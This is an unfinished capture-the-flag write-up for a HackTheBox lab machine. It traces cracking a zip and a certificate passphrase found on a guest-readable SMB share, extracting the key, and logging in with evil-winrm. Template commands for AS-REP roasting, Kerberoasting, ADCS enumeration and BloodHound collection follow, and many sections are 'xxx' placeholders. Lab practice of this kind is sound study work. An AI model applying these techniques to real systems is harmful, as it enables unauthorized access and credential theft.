TIMELAPSE (HTB) - JA Smith

# Lessons Learned - xxx --- # After-Action Attack Sequence - BLUF: xxx - xxx --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260608193143.png]] - `nmap` scan - light ![[images/Pasted image 20260608193258.png]] - create comma separated port list ![[images/Pasted image 20260608193347.png]] - `nmap` scan - detailed ![[images/Pasted image 20260608193646.png]] - `nmap` scan - UDP --- # Service Enum ## Port 445 (SMB) ## Null Auth - `guest` has access to non-default `shares` share ![[images/Pasted image 20260608194002.png]] - connect to `shares` with `smbclient` ![[images/Pasted image 20260608194136.png]] - `winrm_backup.zip` is passphrase protected ![[images/Pasted image 20260608194802.png]] - use `zip2john` on `winrm_backup.zip`![[images/Pasted image 20260608195013.png]] - crack with `john` > this gives us a `.pfx` file ![[images/Pasted image 20260608195206.png]] - try to use `certipy-ad auth -pfx` on `legacyy_dev_auth.pfx` ![[images/Pasted image 20260608200103.png]] - looks like we are missing a password or this is pkcs12 - try to view with `openssl` > we need a password ![[images/Pasted image 20260608200151.png]] - use `pfx2john` on `legacyy_dev_auth.pfx` then `john` to crack ![[images/Pasted image 20260608200726.png]] - use `openssl pkcs12` with above pfx passphrase to extract `cert.pem` and `key.pem` ![[images/Pasted image 20260608201821.png]] - try to use `certipy-ad auth -pfx` on `legacyy_dev_auth.pfx` again while passing in the passphrase > having issues even when using `faketime` ![[images/Pasted image 20260608201915.png]] - `legacyy` is a user - hmmm ## reset - re-extract pub cert and priv key from `.pfx` file ```bash openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt ``` ![[images/Pasted image 20260608210115.png]] - use with `evil-winrm` ```bash evil-winrm -i 10.129.11.193 -S -c legacyy_dev_auth.crt -k legacyy_dev_auth.key ``` ![[images/Pasted image 20260608210426.png]] - explore home share ![[images/Pasted image 20260608210512.png]] - ## Users - `rid-brute` reveals some users ![[images/Pasted image 20260608194257.png]] - let's create a clean `users.txt` ![[images/Pasted image 20260608194507.png]] - same username and password doesn't work ![[images/Pasted image 20260608204308.png]] ## Port xxx (protocol): service_name ver. xxx - xxx --- # AD Enum ## ASREP Roasting ```bash nxc ldap TARGET -d inlanefreight.local -u users.txt -p '' --asreproast asrep.out ``` ## Kerberoasting ```bash nxc ldap TARGET -d inlanefreight.local -u username -p password --kerberoasting kerb.out ``` ## ADCS ```bash nxc ldap TARGET -d inlanefreight.local -u username -p password -M adcs certipy-ad find -target DC.FQDN -u username -p password ``` ## BloodHound - Run remote ingestor ```bash /opt/rusthound-ce -d inlanefreight.local -u inlanefreight@username -p password -z ``` - Spin up container for bloodhound GUI ```bash cd /opt/bloodhound docker compose up -d ``` --- # AD Attack Chain ___ # Revisit Service Enum